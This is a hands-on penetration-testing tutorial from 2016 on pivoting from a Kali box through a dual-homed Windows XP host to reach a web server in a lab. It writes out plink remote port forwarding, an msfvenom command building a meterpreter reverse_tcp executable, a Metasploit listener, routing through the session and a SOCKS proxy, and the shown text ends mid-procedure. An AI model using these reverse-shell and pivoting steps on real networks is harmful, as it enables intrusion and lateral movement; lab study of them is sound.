Ready to Start Your Career?
October 25, 2016
How to Pivot the Network (Port-Forwarding/Redirection) - A Hands-On Look
October 25, 2016
Description:This tutorial is about "moving" through a network (from machine to machine). We use a compromised host as our pivot to move through the network. This tutorial has a lack of screenshots. You can create the screenshots yourself as you follow this tutorial ;-)Prerequisites:You need (at least) three machines for this tutorial. I suggest using VirtualBox or VMware machines.The Attacking Box (Kali Linux)IP: 192.168.1.16Netmask: 255.255.255.0Gateway: 192.168.1.1The pivot host (Windows XP)Dual-Homed - Configure 2 Network Cards in VirtualBox!FIRST IP: 192.168.1.30Netmask: 255.255.255.0SECOND IP: 10.0.0.2Netmask: 255.0.0.0Web server (IIS, Apache - Windows or Linux, whatever u like) -> I use a Windows 2012 serverIP: 10.0.0.10Netmask: 255.0.0.0There is no need to use a gateway!Problem:We want to reach the web server from the attacking box. But how can we do that? Both machines are in different subnets. Try to surf to the web server from the Kali-Box: https://10.0.0.10This does not work!(If you do not understand the problem at this point I highly suggest you leave this tutorial and get comfortable with network topics such as private network ranges and subnetting)Solution:We use the dual-homed machine to pivot to the web server!Scenario 1 (Remote Port Forwarding):We connect to the Windows XP machine using "rdesktop" on the Kali Box. We don´t attack the pivot here.We have the credentials.
- Connect to the Windows XP machine from your Kali Box: rdesktop 192.168.1.30
- Download "plink.exe" from the Kali box to the Windows XP machine(plink.exe can be found on Kali -> "/usr/share/windows-binaries/plink.exe "-> Copy "plink.exe" to you web server root and start apache on Kali.Now you can download "plink.exe" on the Windows XP machine)
- Open a command prompt on the Windows XP machine and navigate to the place where you have saved "plink.exe"
- Start SSH Daemon on Kali-Box. /etc/init.d/ssh start
- Run the following command on the Windows XP machine:plink 192.168.1.16 -P 22 -C -R 127.0.0.1:4444:10.0.0.10:80(Login with your SSH credentials on Kali)
- Generate a Stand-Alone meterpreter executable:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.16 LPORT=443 -f exe -o meterpreter.exe
- Copy meterpreter.exe to Kalis webroot
- Download meterpreter.exe to the XP machine
- Setup the listener on the Kali Box:msfconsoleuse exploit/multi/handlerset PAYLOAD windows/meterpreter/reverse_tcpset LHOST 192.168.1.16set LPORT 443exploit
- Double-Click on meterpreter.exe and run it on the XP Machine
- Now you have the meterpreter connection from the XP Machine on your Kali Box!
- Type "ifconfig" and see that this host is a dual homed machine.
- Type "background" to background the session
- Now we have to add a route to our metasploit session 1:route add 10.0.0.0 255.0.0.0 1(1 is the session number in metasploit)Shows: [*]Route added
- Verify that the route was added successfully:route print
- Now configure socks proxy in metasploit and start it:use auxiliary/server/socks4aset SRVHOST 127.0.0.1run